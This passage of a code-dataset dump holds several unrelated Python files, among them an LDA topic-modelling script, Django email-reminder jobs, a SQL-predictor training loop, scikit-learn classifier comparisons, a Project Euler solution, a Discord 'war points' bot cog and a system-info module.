main()\n\n","sub_path":"HetMan/experiments/subvariant_isolate/setup_isolate.py","file_name":"setup_isolate.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"196885655","text":"import pickle\r\nimport gensim\r\nfrom gensim import corpora\r\nimport pynlpir\r\nimport os\r\nfrom sklearn.utils import Bunch\r\n\r\ndef initbunch(bunch):\r\n bunch.target_name=[]\r\n bunch.label=[]\r\n bunch.filenames=[]\r\n bunch.contents=[]\r\n\r\ndef clean(raw_data_input_path, word_bag_filepath):\r\n '''\r\n 函数说明: 对下载的源新闻文档进行分词处理,并且从分词结果中仅取名词\r\n :param raw_data_input_path: 源文档根目录\r\n :param word_bag_filepath: 将清洗的结果bunch持久化到词袋文件\r\n :return: \r\n '''\r\n bunch = Bunch(target_name=[], label=[], filenames=[], contents=[])\r\n catagorys = os.listdir(raw_data_input_path)\r\n bunch.target_name.extend(catagorys)\r\n pynlpir.open()\r\n head = 'F:\\data'\r\n finished = ['体育', '台湾']\r\n for catagory in catagorys:\r\n if( catagory in finished ):\r\n continue\r\n initbunch(bunch)\r\n catagory_path = os.path.join(raw_data_input_path, catagory)\r\n years = os.listdir(catagory_path)\r\n for year in years:\r\n year_path = os.path.join(head,catagory,year)\r\n months = os.listdir(year_path)\r\n for month in months:\r\n print(\"cleaning \" + catagory + \" month: \" + month)\r\n month_path = os.path.join(year_path, month)\r\n raw_documents = os.listdir(month_path)\r\n for document in raw_documents:\r\n document_path = os.path.join(month_path, document)\r\n # 对每篇文章进行分词处理\r\n f = open(document_path, 'r')\r\n p = f.read()\r\n try:\r\n segments = pynlpir.segment(p, pos_english=True)\r\n except UnicodeDecodeError:\r\n print(catagory + ' ' + document + ' UnicodeDecodeError')\r\n # 对分词结果取名词\r\n seg_only_noun = [element[0] for element in segments if element[1] == 'noun']\r\n document_cleaned = ' '.join(seg_only_noun)\r\n bunch.filenames.append(document)\r\n bunch.label.append(catagory)\r\n bunch.contents.append(document_cleaned)\r\n f = open(word_bag_filepath + catagory + '.dat', 'wb')\r\n pickle.dump(bunch, f)\r\n pynlpir.close()\r\n\r\nif __name__ == '__main__':\r\n # 清洗模块测试\r\n # 训练集\r\n print(\"正在清洗训练集数据\")\r\n train_data_path = 'F:\\\\train'\r\n train_word_bag = 'F:\\\\results\\\\train_word_bag_'\r\n # clean(train_data_path, train_word_bag)\r\n\r\n #测试集\r\n print(\"正在清理测试集数据\")\r\n test_data_path = 'F:\\\\test'\r\n test_word_bag = 'F:\\\\results\\\\test_word_bag_'\r\n # clean(test_data_path, test_word_bag)\r\n\r\n #LDA Sample\r\n print(\"LDA Sample\")\r\n word_bag_filepath = \"F:\\\\result\\\\train_word_bag.dat\"\r\n # 读取bunch\r\n with open(word_bag_filepath, \"rb\") as file_obj:\r\n bunch = pickle.load(file_obj)\r\n # print(bunch.target_name)\r\n # for t in bunch.contents:\r\n # print(t)\r\n word = [doc.split(',') for doc in bunch.contents]\r\n dictionary = corpora.Dictionary(word)\r\n doc_term_matrix = [dictionary.doc2bow(doc) for doc in word]\r\n # for t in doc_term_matrix:\r\n # print(t)\r\n Lda = gensim.models.ldamodel.LdaModel\r\n ldamodel = Lda(doc_term_matrix, num_topics=4, id2word=dictionary, passes=100)\r\n print(ldamodel.print_topics(num_topics=4, num_words=50))","sub_path":"TextClassification/clean/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"518648814","text":"from django.core.mail import send_mail\nfrom django.utils import timezone\n\nfrom instructions.models import Instruction, 
InstructionReminder\nfrom instructions.model_choices import INSTRUCTION_STATUS_NEW, INSTRUCTION_STATUS_PROGRESS\nfrom accounts.models import User, PracticePreferences, GeneralPracticeUser\nfrom common.functions import get_env_variable\n\nfrom smtplib import SMTPException\nimport logging\n\nfrom django.conf import settings\nPIPELINE_INSTRUCTION_LINK = settings.PIPELINE_INSTRUCTION_LINK\n\n\ndef instruction_notification_email_job():\n    now = timezone.now()\n    new_or_pending_instructions = Instruction.objects.filter(\n        status__in=(INSTRUCTION_STATUS_NEW, INSTRUCTION_STATUS_PROGRESS), gp_practice_type__model='organisationgeneralpractice'\n    )\n\n    for instruction in new_or_pending_instructions:\n        diff_date = now - instruction.created\n        if diff_date.days == 3 or diff_date.days == 7 or diff_date.days >= 14:\n            gp_managers = User.objects.filter(\n                userprofilebase__generalpracticeuser__organisation=instruction.gp_practice_id,\n                userprofilebase__generalpracticeuser__role=GeneralPracticeUser.PRACTICE_MANAGER\n            ).values('email')\n            try:\n                send_mail(\n                    'Pending Instruction',\n                    'You have a pending or not started instruction. Click here {link} to see it.'.format(link=PIPELINE_INSTRUCTION_LINK),\n                    'MediData',\n                    [gp['email'] for gp in gp_managers],\n                    fail_silently=True,\n                    auth_user=settings.EMAIL_HOST_USER,\n                    auth_password=settings.EMAIL_HOST_PASSWORD,\n                )\n                if instruction.gp_practice and instruction.gp_practice.organisation_email:\n                    send_mail(\n                        'Pending Instruction',\n                        'You have a pending or not started instruction.',\n                        'MediData',\n                        [instruction.gp_practice.organisation_email],\n                        fail_silently=True,\n                        auth_user=settings.EMAIL_HOST_USER,\n                        auth_password=settings.EMAIL_HOST_PASSWORD,\n                    )\n                InstructionReminder.objects.create(\n                    instruction_id=instruction.id,\n                    note=\"note added to instruction for %s day reminder\"%diff_date.days,\n                    reminder_day=diff_date.days\n                )\n            except SMTPException:\n                logging.error('Send mail FAILED to send message')\n\n\ndef send_email_to_practice_job():\n    unstarted_instructions = Instruction.objects.filter(status=INSTRUCTION_STATUS_NEW, gp_practice_type__model='organisationgeneralpractice')\n    for instruction in unstarted_instructions:\n        gp_practice = instruction.gp_practice\n        practice_preferences = PracticePreferences.objects.get(gp_organisation=gp_practice)\n        if practice_preferences.notification == 'DIGEST':\n            send_mail(\n                'Unstarted Instruction',\n                'You have unstarted instructions. 
Click here {link} to see it.'.format(link=PIPELINE_INSTRUCTION_LINK),\n                'MediData',\n                [gp_practice.organisation_email],\n                fail_silently=True,\n                auth_user=settings.EMAIL_HOST_USER,\n                auth_password=settings.EMAIL_HOST_PASSWORD,\n            )\n","sub_path":"instructions/cron/notification_mail.py","file_name":"notification_mail.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"98178476","text":"# -*- coding: utf-8 -*- \n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom datetime import datetime\n\nclass ItemAgenda(models.Model):\n\tdata = models.DateField()\n\thora = models.TimeField()\n\ttitulo = models.CharField(max_length=100)\n\tdescricao = models.TextField()\n\tusuario = models.ForeignKey(User, related_name='item_usuario', null=True, blank=True)\n\tparticipantes = models.ManyToManyField(User, related_name='item_participantes')\n\n\tclass Meta:\n\t\tdb_table = \"tbl_itens_da_agenda\"\n\nclass PessoaFisica(models.Model):\n\tcpf = models.CharField(max_length=11, primary_key=True)","sub_path":"Agenda/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"567424686","text":"from models import User\nfrom app import remind\n\n\n# Check the time data\ndef check_user_time():\n    # Get the user ids that need a reminder\n    user = User()\n    id_list = user.get_user_id_for_remind()\n    \n    if len(id_list) == 0:\n        return\n    \n    # Send the reminder message to the users\n    for id in id_list:\n        remind(str(id))\n    \n    id_list.clear()\n\n\n\n","sub_path":"reminder.py","file_name":"reminder.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"290456113","text":"import json\nimport torch\nimport datetime\nimport argparse\nimport numpy as np\nfrom utils import *\n# from model.sqlnet import SQLNet\nfrom word_embedding import WordEmbedding\n# from models import MultiSqlPredictor,KeyWordPredictor,ColPredictor,OpPredictor,RootTeminalPredictor,DesAscLimitPredictor,AggPredictor\nfrom models.agg_predictor import AggPredictor\nfrom models.col_predictor import ColPredictor\nfrom models.desasc_limit_predictor import DesAscLimitPredictor\nfrom models.having_predictor import HavingPredictor\nfrom models.keyword_predictor import KeyWordPredictor\nfrom models.multisql_predictor import MultiSqlPredictor\nfrom models.op_predictor import OpPredictor\nfrom models.root_teminal_predictor import RootTeminalPredictor\n\nTRAIN_COMPONENTS = ('multi_sql','keyword','col','op','agg','root_tem','des_asc','having')\nSQL_TOK = ['<UNK>', '<END>', 'WHERE', 'AND', 'EQL', 'GT', 'LT', '<BEG>']\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--toy', action='store_true',\n            help='If set, use small data; used for fast debugging.')\n    parser.add_argument('--suffix', type=str, default='',\n            help='The suffix at the end of saved model name.')\n    parser.add_argument('--sd', type=str, default='',\n            help='set model save directory.')\n    parser.add_argument('--dataset', type=int, default=0,\n            help='0: original dataset, 1: re-split dataset, 2: new complex dataset')\n    parser.add_argument('--train_emb', action='store_true',\n            help='Train word embedding.')\n    parser.add_argument('--train_component',type=str,default='',\n                        help='set train 
components,available:[multi_sql,keyword,col,op,agg,root_tem,des_asc,having]')\n    parser.add_argument('--epoch',type=int,default=500,\n                        help='number of epoch for training')\n    args = parser.parse_args()\n\n    N_word=300\n    B_word=42\n    N_h = 300\n    N_depth=2\n    if args.toy:\n        USE_SMALL=True\n        GPU=True\n        BATCH_SIZE=20\n    else:\n        USE_SMALL=False\n        GPU=True\n        BATCH_SIZE=64\n    # TRAIN_ENTRY=(False, True, False)  # (AGG, SEL, COND)\n    # TRAIN_AGG, TRAIN_SEL, TRAIN_COND = TRAIN_ENTRY\n    learning_rate = 1e-4\n    if args.train_component not in TRAIN_COMPONENTS:\n        print(\"Invalid train component\")\n        exit(1)\n    train_data = load_train_dev_dataset(args.train_component,\"train\")\n    dev_data = load_train_dev_dataset(args.train_component, \"dev\")\n    # sql_data, table_data, val_sql_data, val_table_data, \\\n    #         test_sql_data, test_table_data, \\\n    #         TRAIN_DB, DEV_DB, TEST_DB = load_dataset(args.dataset, use_small=USE_SMALL)\n\n    word_emb = load_word_emb('glove/glove.%dB.%dd.txt'%(B_word,N_word), \\\n            load_used=args.train_emb, use_small=USE_SMALL)\n    print(\"finished loading word embedding\")\n    #word_emb = load_concat_wemb('glove/glove.42B.300d.txt', \"/data/projects/paraphrase/generation/para-nmt-50m/data/paragram_sl999_czeng.txt\")\n    model = None\n    if args.train_component == \"multi_sql\":\n        model = MultiSqlPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n    elif args.train_component == \"keyword\":\n        model = KeyWordPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n    elif args.train_component == \"col\":\n        model = ColPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n    elif args.train_component == \"op\":\n        model = OpPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n    elif args.train_component == \"agg\":\n        model = AggPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n    elif args.train_component == \"root_tem\":\n        model = RootTeminalPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n    elif args.train_component == \"des_asc\":\n        model = DesAscLimitPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n    elif args.train_component == \"having\":\n        model = HavingPredictor(N_word=N_word,N_h=N_h,N_depth=N_depth,gpu=GPU)\n    # model = SQLNet(word_emb, N_word=N_word, gpu=GPU, trainable_emb=args.train_emb)\n    optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay = 0)\n    print(\"finished building model\")\n    # agg_m, sel_m, cond_m = best_model_name(args)\n    #\n    # if args.train_emb: # Load pretrained model.\n    #     agg_lm, sel_lm, cond_lm = best_model_name(args, for_load=True)\n    #     print \"Loading from %s\"%agg_lm\n    #     model.agg_pred.load_state_dict(torch.load(agg_lm))\n    #     print \"Loading from %s\"%sel_lm\n    #     model.selcond_pred.load_state_dict(torch.load(sel_lm))\n    #     print \"Loading from %s\"%cond_lm\n    #     model.cond_pred.load_state_dict(torch.load(cond_lm))\n\n\n    #initial accuracy\n    # init_acc = epoch_acc(model, BATCH_SIZE, val_sql_data, val_table_data, TRAIN_ENTRY)\n    # if TRAIN_AGG:\n    #     torch.save(model.agg_pred.state_dict(), agg_m)\n    # if TRAIN_SEL:\n    #     torch.save(model.selcond_pred.state_dict(), sel_m)\n    # if TRAIN_COND:\n    #     torch.save(model.op_str_pred.state_dict(), cond_m)\n\n    print_flag = False\n    embed_layer = WordEmbedding(word_emb, N_word, gpu=GPU,\n                                SQL_TOK=SQL_TOK, trainable=args.train_emb)\n    print(\"start training\")\n    best_acc = 0.0\n    for i in range(args.epoch):\n        print('Epoch %d @ %s'%(i+1, datetime.datetime.now()))\n        print(' Loss = %s'%epoch_train(\n            model, optimizer, BATCH_SIZE,args.train_component,embed_layer,train_data))\n        acc = epoch_acc(model, BATCH_SIZE, 
args.train_component,embed_layer,dev_data)\n        if acc > best_acc:\n            best_acc = acc\n            print(\"Save model...\")\n            torch.save(model.state_dict(),\"saved_models/{}_models.dump\".format(args.train_component))\n        # print '\\nTrain sel acc: %s, sel # acc: %s' % (train_bkd_acc[1], train_bkd_acc[0])\n        #print ' Breakdown results: agg #: %s, agg: %s, sel: %s, cond: %s, sel #: %s, cond #: %s, cond col: %s, cond op: %s, cond val: %s, group #: %s, group: %s, order #: %s, order: %s, order agg: %s, order par: %s'\\\n        #    % (train_bkd_acc[0], train_bkd_acc[1], train_bkd_acc[2], train_bkd_acc[3], train_bkd_acc[4], train_bkd_acc[5], train_bkd_acc[6], train_bkd_acc[7], train_bkd_acc[8], train_bkd_acc[9], train_bkd_acc[10], train_bkd_acc[11], train_bkd_acc[12], train_bkd_acc[13], train_bkd_acc[14])\n        # if i > 497:\n        #     print_flag = True\n        # val_tot_acc, val_bkd_acc = epoch_acc(model, BATCH_SIZE, val_sql_data, val_table_data, TRAIN_ENTRY, error_print = print_flag, train_flag = False) #for detailed error analysis, pass True to error_print\n        # print '\\nDev sel acc: %s, sel # acc: %s' % (val_bkd_acc[1], val_bkd_acc[0])\n        #print ' Breakdown results: agg #: %s, agg: %s, sel: %s, cond: %s, sel #: %s, cond #: %s, cond col: %s, cond op: %s, cond val: %s, group #: %s, group: %s, order #: %s, order: %s, order agg: %s, order par: %s'\\\n        #    % (val_bkd_acc[0], val_bkd_acc[1], val_bkd_acc[2], val_bkd_acc[3], val_bkd_acc[4], val_bkd_acc[5], val_bkd_acc[6], val_bkd_acc[7], val_bkd_acc[8], val_bkd_acc[9], val_bkd_acc[10], val_bkd_acc[11], val_bkd_acc[12], val_bkd_acc[13], val_bkd_acc[14])\n\n","sub_path":"hierachical_col_emb_version/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"430820627","text":"\n\nimport matplotlib.pyplot as plt\nfrom prep_terrain_data import makeTerrainData\nfrom class_vis import prettyPicture\n\nfeatures_train, labels_train, features_test, labels_test = makeTerrainData()\n\n\n### the training data (features_train, labels_train) have both \"fast\" and \"slow\"\n### points mixed together--separate them so we can give them different colors\n### in the scatterplot and identify them visually\ngrade_fast = [features_train[ii][0] for ii in range(0, len(features_train)) if labels_train[ii]==0]\nbumpy_fast = [features_train[ii][1] for ii in range(0, len(features_train)) if labels_train[ii]==0]\ngrade_slow = [features_train[ii][0] for ii in range(0, len(features_train)) if labels_train[ii]==1]\nbumpy_slow = [features_train[ii][1] for ii in range(0, len(features_train)) if labels_train[ii]==1]\n\n#### initial visualization\nplt.xlim(0.0, 1.0)\nplt.ylim(0.0, 1.0)\nplt.scatter(bumpy_fast, grade_fast, color = \"b\", label=\"fast\")\nplt.scatter(grade_slow, bumpy_slow, color = \"r\", label=\"slow\")\nplt.legend()\nplt.xlabel(\"bumpiness\")\nplt.ylabel(\"grade\")\nplt.show()\n\n################################################################################\n\n### Decision tree \nfrom sklearn import tree\nfrom sklearn.metrics import accuracy_score\nclf = tree.DecisionTreeClassifier(min_samples_split=40)\nclf = clf.fit(features_train,labels_train)\npred = clf.predict(features_test)\nacc = accuracy_score(pred, labels_test)\nprint(acc)\n# -> 0.912\n\n# SVM\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\nclf = SVC(kernel='rbf',C=10000.)\nclf.fit(features_train, labels_train)\npred = clf.predict(features_test)\nacc = accuracy_score(pred,labels_test)\nprint(acc)\n# -> 
0.932\n\n# AdaBoost Classifier \nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import AdaBoostClassifier\nclf = AdaBoostClassifier(n_estimators=100)\nscores = cross_val_score(clf, features_train, labels_train)\nprint(scores.mean())\n# -> 0.9427\n\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\nclf = DecisionTreeClassifier(max_depth=None, min_samples_split=2,random_state=0)\nscores = cross_val_score(clf, features_train, labels_train)\nprint(\"DecisionTreeClassifier: \")\nprint(scores.mean())\n# -> DecisionTreeClassifier: 0.945370133922\n\nclf = RandomForestClassifier(n_estimators=10, max_depth=None,min_samples_split=2, random_state=0)\nscores = cross_val_score(clf, features_train, labels_train)\nprint('RandomForestClassifier: ')\nprint(scores.mean())\n# -> RandomForestClassifier: 0.952031488504\n\nclf = ExtraTreesClassifier(n_estimators=10, max_depth=None,min_samples_split=2, random_state=0)\nscores = cross_val_score(clf, features_train, labels_train)\nprint('ExtraTreesClassifier: ')\nprint(scores.mean())\n# -> ExtraTreesClassifier: 0.94136477917\n\ntry:\n\tprettyPicture(clf, features_test, labels_test)\nexcept NameError:\n\tpass\n","sub_path":"Machine-Learning/algorithm_selection.py","file_name":"algorithm_selection.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"265622253","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nProblem 6\r\nThe sum of the squares of the first ten natural numbers is,\r\n\r\n1^2 + 2^2 + ... + 10^2 = 385\r\nThe square of the sum of the first ten natural numbers is,\r\n\r\n(1 + 2 + ... 
+ 10)^2 = 55^2 = 3025\r\n\r\nHence the difference between the sum of the squares of the first ten natural\r\n numbers and the square of the sum is 3025 − 385 = 2640.\r\n\r\nFind the difference between the sum of the squares of the first one hundred \r\nnatural numbers and the square of the sum.\r\n\"\"\"\r\n\r\ndef sum_squares (n):\r\n    i = 0\r\n    sum = 0\r\n    for i in range (1,n+1):\r\n        sum = sum + i**2\r\n        i += 1\r\n#        print (i,sum, \"sum in for\")\r\n    \r\n    return sum\r\n    \r\ndef square_sum (m):\r\n    j = 0\r\n    ssum = 0\r\n    for j in range (1,m+1):\r\n        ssum = ssum + j\r\n        j += 1\r\n#        print (j,ssum, \"square sum\")\r\n\r\n    return (ssum**2)\r\n    \r\n    \r\ns_square = 100\r\na = sum_squares(s_square)\r\nb = square_sum(s_square)\r\nprint (\"sum of squares of \",s_square,\" is \", a)\r\nprint (\"the square of the sum of \", s_square, \" is \", b)\r\nprint (\"the difference is \", b - a )\r\n\r\n\r\n","sub_path":"Euler project no 6.py","file_name":"Euler project no 6.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"322517884","text":"import discord\nfrom discord.ext import commands\nimport sys, asyncio\nfrom utils.functions import (\n    getMemberKillCounts,\n    getFormattedMemberKillCounts,\n    getAllianceName,\n    getKillCount,\n    getWarPointsChannel,\n    getTotalKillCounts\n)\nfrom utils.db import incrementMemberKillCount, setWarPointsChannel #, resetWarPoints\nimport math as m\n\n\nclass WarCog(commands.Cog):\n    \n    def __init__(self, bot):\n        self.bot = bot\n        self.next = '\\N{BLACK RIGHTWARDS ARROW}'\n        self.prev = '\\N{LEFTWARDS BLACK ARROW}'\n    \n    @commands.Cog.listener()\n    async def on_message(self, message):\n\n        channel = getWarPointsChannel(message.guild.id)\n        if message.channel.name == channel and not message.author.bot and message.attachments:\n\n            allianceId = ''\n            name = ''\n            test = ''\n            try: #[] RULE\n                # first assume nickname with [TAG] name\n                test = allianceId = message.author.nick.split(']')[1]\n                allianceId = message.author.nick.split(']')[0][1::]\n                name = message.author.nick.split(' ')[1]\n            except:\n                try:\n                    # If failed assume name with [TAG] name\n                    test = allianceId = message.author.name.split(']')[1]\n                    allianceId = message.author.name.split(']')[0][1::]\n                    name = message.author.name.split(' ')[1]\n                except:\n                    try:\n                        # If failed assume nickname with [TAG]name\n                        test = allianceId = message.author.nick.split(']')[1]\n                        allianceId = message.author.nick.split(']')[0][1::]\n                        name = message.author.nick.split(']')[1]\n                    except:\n                        try:\n                            # If failed assume name with [TAG]name\n                            test = allianceId = message.author.name.split(']')[1]\n                            allianceId = message.author.name.split(']')[0][1::]\n                            name = message.author.name.split(']')[1]\n                        except:\n                            try: #() RULE\n                                # first assume nickname with (TAG) name\n                                test = allianceId = message.author.nick.split(')')[1]\n                                allianceId = message.author.nick.split(')')[0][1::]\n                                name = message.author.nick.split(' ')[1]\n                            except:\n                                try:\n                                    # If failed assume name with (TAG) name\n                                    test = allianceId = message.author.name.split(')')[1]\n                                    allianceId = message.author.name.split(')')[0][1::]\n                                    name = message.author.name.split(' ')[1]\n                                except:\n                                    try:\n                                        # If failed assume name with (TAG)name\n                                        test = allianceId = message.author.name.split(')')[1]\n                                        allianceId = message.author.name.split(')')[0][1::]\n                                        name = message.author.name.split(')')[1]\n                                    except:\n                                        try: #<> RULE\n                                            # first assume nickname with <TAG> name\n                                            test = allianceId = message.author.nick.split('>')[1]\n                                            allianceId = 
message.author.nick.split('>')[0][1::]\n                                            name = message.author.nick.split(' ')[1]\n                                        except:\n                                            try:\n                                                # If failed assume name with <TAG> name\n                                                test = allianceId = message.author.name.split('>')[1]\n                                                allianceId = message.author.name.split('>')[0][1::]\n                                                name = message.author.name.split(' ')[1]\n                                            except:\n                                                try:\n                                                    # If failed assume name with <TAG>name\n                                                    test = allianceId = message.author.name.split('>')[1]\n                                                    allianceId = message.author.name.split('>')[0][1::]\n                                                    name = message.author.name.split('>')[1]\n                                                except:\n                                                    #user is doing something weird... accept it\n                                                    allianceId = '???'\n                                                    name = message.author.name\n\n\n            incrementMemberKillCount(message.guild.id, message.author.id, name, allianceId)\n            killCount = getKillCount(message.author.id)\n            msg = '.\n{}, your **kill** has been recorded :smiling_imp:'.format(message.author.mention)\n            msg += '\n```Kill Count: {}```'.format(killCount)\n            await message.channel.send(msg)\n\n        await self.bot.process_commands(message)\n\n\n\n    @commands.command()\n    async def warpointoverride(self, ctx):\n        if ctx.message.author.name.lower() != 'bop':\n            return\n\n        if len(ctx.message.mentions) > 0:\n            member = ctx.message.mentions[0]\n\n            allianceId = ''\n            name = ''\n            try: \n                allianceId = member.nick.split(']')[0][1::]\n                name = member.nick.split(' ')[1]\n            except:\n                allianceId = member.name.split(']')[0][1::]\n                try:\n                    name = member.name.split(' ')[1]\n                except:\n                    name = member.name.split(']')[1]\n\n            incrementMemberKillCount(ctx.guild.id, member.id, name, allianceId)\n            killCount = getKillCount(member.id)\n            msg = \".\n{}, {}'s **kill** has been recorded :smiling_imp:\".format(ctx.message.author.mention, member.name)\n            msg += '\n```{} Kill Count: {}```'.format(member.name, killCount)\n            await ctx.message.channel.send(msg)\n\n\n    @commands.command()\n    async def mywarpoints(self, ctx):\n        if ctx.guild.id != 524400503967187011:\n            return\n\n        killCount = getKillCount(ctx.message.author.id)\n        msg = '.\n{}, your **kill** count is below :smiling_imp:'.format(ctx.message.author.mention)\n        msg += '\n```Kill Count: {}```'.format(killCount)\n        await ctx.message.channel.send(msg)\n\n\n    @commands.command()\n    async def warpoints(self, ctx, allianceId=''):\n\n        isAdmin = ctx.message.author.guild_permissions.administrator\n\n        if allianceId.lower() == 'begin':\n            # ERROR: Admin required to spin up warpoints\n            if not isAdmin:\n                await ctx.message.channel.send('{}, you must be an admin on this server to spin up warpoints.'.format(ctx.message.author.mention))\n                return\n\n            setWarPointsChannel(ctx.guild.id, ctx.channel.name)\n            msg = '.\n{}, This channel **({})** has been set up for warpoints.'.format(ctx.message.author.mention, ctx.channel.name)\n            msg += '\n**Screenshots of kills will now be recorded here** :smiling_imp:'\n            await ctx.message.channel.send(msg)\n            return\n\n        # if allianceId.lower() == 'reset':\n        #     # ERROR: Admin required to spin up warpoints\n        #     if not isAdmin:\n        #         await ctx.message.channel.send('{}, you must be an admin on this server to reset alliance warpoints.'.format(ctx.message.author.mention))\n        #         return\n\n        #     resetWarPoints(ctx.guild.id)\n        #     msg = '.\n{}, All warpoints have been reset for your alliance.'.format(ctx.message.author.mention)\n        #     await ctx.message.channel.send(msg)\n        #     return\n\n        title = getAllianceName(ctx.guild.id)\n        spacer = '\n--------------------------------------------------\n'\n\n        # function to check that reaction is from user who called this command\n        def checkUser(reaction, user):\n            return user == ctx.message.author\n        \n        # violations is paged, so we need some 
variables to help do that correctly\n        idx = 0\n        maxPage = 15\n        page = 1\n        numPages = 1\n        intro = '[OPENING] Secure connection...\n*Transmitting* sensitive data.. ...\n\n'\n\n        # check to see if a specific player or alliance was mentioned, to add to the query\n        alliance = ''\n        if (allianceId):\n            alliance = allianceId.upper()\n\n        # get this server's violations, and determine number of pages\n        results = getMemberKillCounts(ctx.guild.id, alliance)\n        allianceTotal = getTotalKillCounts(ctx.guild.id)\n        numPages = m.ceil(len(results) / maxPage)\n        pageEnd = maxPage if len(results) >= maxPage else len(results)\n\n\n        killList = getFormattedMemberKillCounts(results[idx:pageEnd])\n        embed = discord.Embed(title='**Member Kill Counts**', description=intro+spacer+killList+spacer[1::], color=000000)\n        embed.set_author(name=title, icon_url=ctx.guild.icon_url)\n        embed.set_footer(text='SECURE CONNECTION: true | Total Kills:{} | pg {}/{}'.format(allianceTotal, page, numPages))\n        msg = await ctx.send(embed=embed)\n\n        try:\n            while True:\n                killList = getFormattedMemberKillCounts(results[idx:pageEnd])\n                embed = discord.Embed(title='**Member Kill Counts**', description=intro+spacer+killList+spacer[1::], color=000000)\n                embed.set_author(name=title, icon_url=ctx.guild.icon_url)\n                embed.set_footer(text='SECURE CONNECTION: true | Total Kills:{} | pg {}/{}'.format(allianceTotal, page, numPages))\n                await msg.edit(embed=embed)\n\n\n                if page > 1:\n                    await msg.add_reaction(emoji=self.prev)\n                if page * maxPage < len(results):\n                    await msg.add_reaction(emoji=self.next)\n\n                reaction, user = await self.bot.wait_for('reaction_add', timeout=120.0, check=checkUser)\n\n                # page the results forward, reset page number, page end, and the index\n                if reaction.emoji == self.next:\n                    page += 1\n                    idx = pageEnd\n                    pageEnd = (page * maxPage) if len(results) >= (page * maxPage) else len(results)\n\n                # page the results backwards, reset page number, page end, and the index\n                if reaction.emoji == self.prev:\n                    page -= 1\n                    pageEnd = idx\n                    idx = pageEnd - maxPage\n\n                # clear ALL reactions, reset state of interface.\n                await msg.clear_reactions()\n                return\n\n        # UH OH TIMED OUT\n        except asyncio.TimeoutError:\n            embed = discord.Embed(title='**Member Kill Counts**', description=intro+spacer+killList+spacer[1::], color=000000)\n            embed.set_author(name=title, icon_url=ctx.guild.icon_url)\n            embed.set_footer(text='CONNECTION CLOSED: Session timed out')\n            msg = await msg.edit(embed=embed)\n            await msg.clear_reactions()\n            return\n\n\n\n\n\n# set the cog up\ndef setup(bot):\n    bot.add_cog(WarCog(bot))\n","sub_path":"bot/cogs/war.py","file_name":"war.py","file_ext":"py","file_size_in_byte":11672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"341559456","text":"from ._version import __version__\nimport platform\nimport psutil\nimport os\nimport sys\nimport socket\n\nclass System:\n\n    def get_networks(self):\n        interfaces = psutil.net_if_addrs()\n        results = {}\n        for interface in interfaces:\n            if interface == 'lo': continue\n            print(interface)\n            results[interface] = { \"mac\": None, \"ip\": None}\n            for sni in interfaces[interface]:\n                if sni.family == socket.AF_PACKET:\n                    results[interface][\"mac\"] = sni.address\n                if sni.family == socket.AF_INET:\n                    results[interface][\"ip\"] = sni.address\n        return results\n\n    def info(self):\n        return {\n            \"version\": __version__,\n            \"os\": platform.platform(),\n            \"hostname\": platform.node(),\n            \"network\": self.get_networks(),\n            \"python\": {\n                \"version\": 
sys.version.partition(\"\\n\")[0]\n            },\n            \"node\": {\n                \"version\": os.popen(\"node --version\").read().partition(\"\\n\")[0]\n            },\n            \"uptime\": os.popen('uptime -p').read()[:-1]\n        }","sub_path":"senseapp/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
